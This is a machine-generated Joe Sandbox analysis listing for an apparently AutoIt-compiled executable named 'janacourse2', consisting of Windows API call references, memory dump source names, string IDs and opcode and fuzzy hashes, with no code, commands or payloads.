                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048487
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 010484CA
                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048501
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0104850D
                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0104851D
                                                                                                            • DestroyIcon.USER32(?), ref: 0104852C
                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01048549
                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01048555
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                            • API String ID: 799131459-1154884017
                                                                                                            • Opcode ID: 944b5b08399b7ef7eee41967af3fe388b9fad84d5a25b8fbae69b18cd54975ef
                                                                                                            • Instruction ID: d056396e30106776f8a75604908a11c3c17537e9ec230d124a8605a5c87b3850
                                                                                                            • Opcode Fuzzy Hash: 944b5b08399b7ef7eee41967af3fe388b9fad84d5a25b8fbae69b18cd54975ef
                                                                                                            • Instruction Fuzzy Hash: 356126B1900204BFEB24CFA4CDC1BBE77A8BF04711F00895AF995D61C1DB79A980DBA0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                            • API String ID: 0-1645009161
                                                                                                            • Opcode ID: 0a6bd7b6a6b3c679ea0a1f87062892eb9463447ffd3b96d36b6a3880fe8daa32
                                                                                                            • Instruction ID: 923af481db5930e64d7bbd155a29cfb2040c028c8dc6cb51c28513675a97bf9f
                                                                                                            • Opcode Fuzzy Hash: 0a6bd7b6a6b3c679ea0a1f87062892eb9463447ffd3b96d36b6a3880fe8daa32
                                                                                                            • Instruction Fuzzy Hash: 228118B1A04709BBDB20BF62CC42FFE77A5AF55700F144025FA05AA192EB74D911FB91
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000063), ref: 01015A2E
                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 01015A40
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 01015A57
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 01015A6C
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 01015A72
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 01015A82
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 01015A88
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 01015AA9
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 01015AC3
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01015ACC
                                                                                                            • _wcslen.LIBCMT ref: 01015B33
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 01015B6F
                                                                                                            • GetDesktopWindow.USER32 ref: 01015B75
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01015B7C
                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 01015BD3
                                                                                                            • GetClientRect.USER32(?,?), ref: 01015BE0
                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 01015C05
                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01015C2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 895679908-0
                                                                                                            • Opcode ID: 89d914ecc9f0c55888be6f3247fd1c93b10216dcdfcdcfe88d64eb8c89118adf
                                                                                                            • Instruction ID: 6e6f5d4c0a09f237421ad572a5fabe5dbe847e77acc62d5c98e4101fd6ad29e3
                                                                                                            • Opcode Fuzzy Hash: 89d914ecc9f0c55888be6f3247fd1c93b10216dcdfcdcfe88d64eb8c89118adf
                                                                                                            • Instruction Fuzzy Hash: 41717C71900709AFEB20DFA8CE85AAEBBF5FF88704F104958E582A7594D779E940CF50
                                                                                                            APIs
                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FD00C6
                                                                                                              • Part of subcall function 00FD00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0108070C,00000FA0,85A7DEC7,?,?,?,?,00FF23B3,000000FF), ref: 00FD011C
                                                                                                              • Part of subcall function 00FD00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00FF23B3,000000FF), ref: 00FD0127
                                                                                                              • Part of subcall function 00FD00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00FF23B3,000000FF), ref: 00FD0138
                                                                                                              • Part of subcall function 00FD00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FD014E
                                                                                                              • Part of subcall function 00FD00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FD015C
                                                                                                              • Part of subcall function 00FD00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FD016A
                                                                                                              • Part of subcall function 00FD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD0195
                                                                                                              • Part of subcall function 00FD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD01A0
                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00FD00E7
                                                                                                              • Part of subcall function 00FD00A3: __onexit.LIBCMT ref: 00FD00A9
                                                                                                            Strings
                                                                                                            • WakeAllConditionVariable, xrefs: 00FD0162
                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FD0122
                                                                                                            • InitializeConditionVariable, xrefs: 00FD0148
                                                                                                            • SleepConditionVariableCS, xrefs: 00FD0154
                                                                                                            • kernel32.dll, xrefs: 00FD0133
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                            • API String ID: 66158676-1714406822
                                                                                                            • Opcode ID: ca32bff215e006c03162dd4f2890d317b80392504f70edf3281629bf9ac310ac
                                                                                                            • Instruction ID: 4003dd124960342809d289a81138e6d6c6b073495ebfcf6bf00558d84cf42b96
                                                                                                            • Opcode Fuzzy Hash: ca32bff215e006c03162dd4f2890d317b80392504f70edf3281629bf9ac310ac
                                                                                                            • Instruction Fuzzy Hash: C1210AB2E457116BE7207B65AE46B6D7396EB05B61F04013FF8C196344DE798C009B90
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                            • API String ID: 176396367-1603158881
                                                                                                            • Opcode ID: 8ab1d09c43c97edd7421e581d4366c7c542dffcc632b95282a69947fbfbe2146
                                                                                                            • Instruction ID: 88ac7a533297c9eeed562417c2a635ccba393f96ee726678ec8b67bc2f7b9c86
                                                                                                            • Opcode Fuzzy Hash: 8ab1d09c43c97edd7421e581d4366c7c542dffcc632b95282a69947fbfbe2146
                                                                                                            • Instruction Fuzzy Hash: 46E10332A001169BDB199FA8C841BFEFBB5BF04720F14815AE496EB244DF38A945DB90
                                                                                                            APIs
                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,0104CC08), ref: 01024527
                                                                                                            • _wcslen.LIBCMT ref: 0102453B
                                                                                                            • _wcslen.LIBCMT ref: 01024599
                                                                                                            • _wcslen.LIBCMT ref: 010245F4
                                                                                                            • _wcslen.LIBCMT ref: 0102463F
                                                                                                            • _wcslen.LIBCMT ref: 010246A7
                                                                                                              • Part of subcall function 00FCF9F2: _wcslen.LIBCMT ref: 00FCF9FD
                                                                                                            • GetDriveTypeW.KERNEL32(?,01076BF0,00000061), ref: 01024743
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                            • Opcode ID: b90d188f1ed5a0ae63ed8ddf07b3c92cbc504693b0c91651c70a32165bacc450
                                                                                                            • Instruction ID: 13f53743fbf4dd83bea2062eb0792287fb5b29f3210a1d075aed1e93228d345f
                                                                                                            • Opcode Fuzzy Hash: b90d188f1ed5a0ae63ed8ddf07b3c92cbc504693b0c91651c70a32165bacc450
                                                                                                            • Instruction Fuzzy Hash: 07B1EE716083229BC720DF29C890A6EB7E5BF99720F40495DF5E6C7292D774D884CAA2
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0103B198
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103B1B0
                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103B1D4
                                                                                                            • _wcslen.LIBCMT ref: 0103B200
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103B214
                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103B236
                                                                                                            • _wcslen.LIBCMT ref: 0103B332
                                                                                                              • Part of subcall function 010205A7: GetStdHandle.KERNEL32(000000F6), ref: 010205C6
                                                                                                            • _wcslen.LIBCMT ref: 0103B34B
                                                                                                            • _wcslen.LIBCMT ref: 0103B366
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0103B3B6
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0103B407
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0103B439
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103B44A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103B45C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0103B46E
                                                                                                            • CloseHandle.KERNEL32(?), ref: 0103B4E3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 2178637699-0
                                                                                                            • Opcode ID: ada7d1a446d60b042dd4af32fd7eeecf518dfd609b8521f087c2a670afe23d9c
                                                                                                            • Instruction ID: e993674fb87aca36835344704f9b58eb36de894d020dfa1cad1d997067fe3e49
                                                                                                            • Opcode Fuzzy Hash: ada7d1a446d60b042dd4af32fd7eeecf518dfd609b8521f087c2a670afe23d9c
                                                                                                            • Instruction Fuzzy Hash: 04F1AE716083009FD724EF29C891B6EBBE9AFC5314F18855DF9958B2A6CB35E804CB52
                                                                                                            APIs
                                                                                                            • GetMenuItemCount.USER32(01081990), ref: 00FF2F8D
                                                                                                            • GetMenuItemCount.USER32(01081990), ref: 00FF303D
                                                                                                            • GetCursorPos.USER32(?), ref: 00FF3081
                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00FF308A
                                                                                                            • TrackPopupMenuEx.USER32(01081990,00000000,?,00000000,00000000,00000000), ref: 00FF309D
                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FF30A9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 36266755-4108050209
                                                                                                            • Opcode ID: 8516ece18c2f20152dbba997ab758930598530243330083c72e5cc16900b365a
                                                                                                            • Instruction ID: c30af7410b77cd70149d509aabcfb45e43655643bc4695a8f54e0692742fde6a
                                                                                                            • Opcode Fuzzy Hash: 8516ece18c2f20152dbba997ab758930598530243330083c72e5cc16900b365a
                                                                                                            • Instruction Fuzzy Hash: D271F771A40209BFFB218F65CD89FAABF64FF04324F204216F6156A1E0C7B5A950EB91
                                                                                                            APIs
                                                                                                            • DestroyWindow.USER32(?,?), ref: 01046DEB
                                                                                                              • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01046E5F
                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 01046E81
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01046E94
                                                                                                            • DestroyWindow.USER32(?), ref: 01046EB5
                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FB0000,00000000), ref: 01046EE4
                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01046EFD
                                                                                                            • GetDesktopWindow.USER32 ref: 01046F16
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01046F1D
                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01046F35
                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01046F4D
                                                                                                              • Part of subcall function 00FC9944: GetWindowLongW.USER32(?,000000EB), ref: 00FC9952
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                            • String ID: 0$tooltips_class32
                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                            • Opcode ID: bbb0b50e1f632782455bcc8e91b9e1bb59b94634b6d4f0c489de79130f295bae
                                                                                                            • Instruction ID: dd479b368f5b0bdd0567b66aa81fc06395649c9fb3aa8a92a5268f62b5e15d70
                                                                                                            • Opcode Fuzzy Hash: bbb0b50e1f632782455bcc8e91b9e1bb59b94634b6d4f0c489de79130f295bae
                                                                                                            • Instruction Fuzzy Hash: 1D717BB4104340AFEB21CF1DC984EAABBF9FB8A300F44446DF9D987261D776A906CB11
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            • DragQueryPoint.SHELL32(?,?), ref: 01049147
                                                                                                              • Part of subcall function 01047674: ClientToScreen.USER32(?,?), ref: 0104769A
                                                                                                              • Part of subcall function 01047674: GetWindowRect.USER32(?,?), ref: 01047710
                                                                                                              • Part of subcall function 01047674: PtInRect.USER32(?,?,01048B89), ref: 01047720
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 010491B0
                                                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 010491BB
                                                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 010491DE
                                                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 01049225
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0104923E
                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 01049255
                                                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 01049277
                                                                                                            • DragFinish.SHELL32(?), ref: 0104927E
                                                                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 01049371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                            • API String ID: 221274066-3440237614
                                                                                                            • Opcode ID: 9fe190b1c894ba9b10b3f14c2da12487cabc6b3d570532734a6b666965f55ab6
                                                                                                            • Instruction ID: ae2253eb6521e038e8b83200ec85c573cbeb3966af9fc62f12942e7770802f71
                                                                                                            • Opcode Fuzzy Hash: 9fe190b1c894ba9b10b3f14c2da12487cabc6b3d570532734a6b666965f55ab6
                                                                                                            • Instruction Fuzzy Hash: 84618AB1108301AFD311EF61DD85DAFBBE8EF88350F00092DF591931A0DB759A49CB52
                                                                                                            APIs
                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102C4B0
                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102C4C3
                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102C4D7
                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0102C4F0
                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0102C533
                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0102C549
                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102C554
                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102C584
                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102C5DC
                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102C5F0
                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0102C5FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                            • Opcode ID: 012cd350f03d708f68900f2c6f273ff4812f5df9624e5cf7d7806dc948b381dc
                                                                                                            • Instruction ID: 5885097def1df09894162358b9658b889fe87ac5b5a28770c298a016f4f7d28d
                                                                                                            • Opcode Fuzzy Hash: 012cd350f03d708f68900f2c6f273ff4812f5df9624e5cf7d7806dc948b381dc
                                                                                                            • Instruction Fuzzy Hash: 05515BB4501629BFFB218F64CB88AAF7BFCFF08744F004419F98696200DB39D9449B60
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 01048592
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 010485A2
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000), ref: 010485AD
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 010485BA
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 010485C8
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 010485D7
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 010485E0
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 010485E7
                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 010485F8
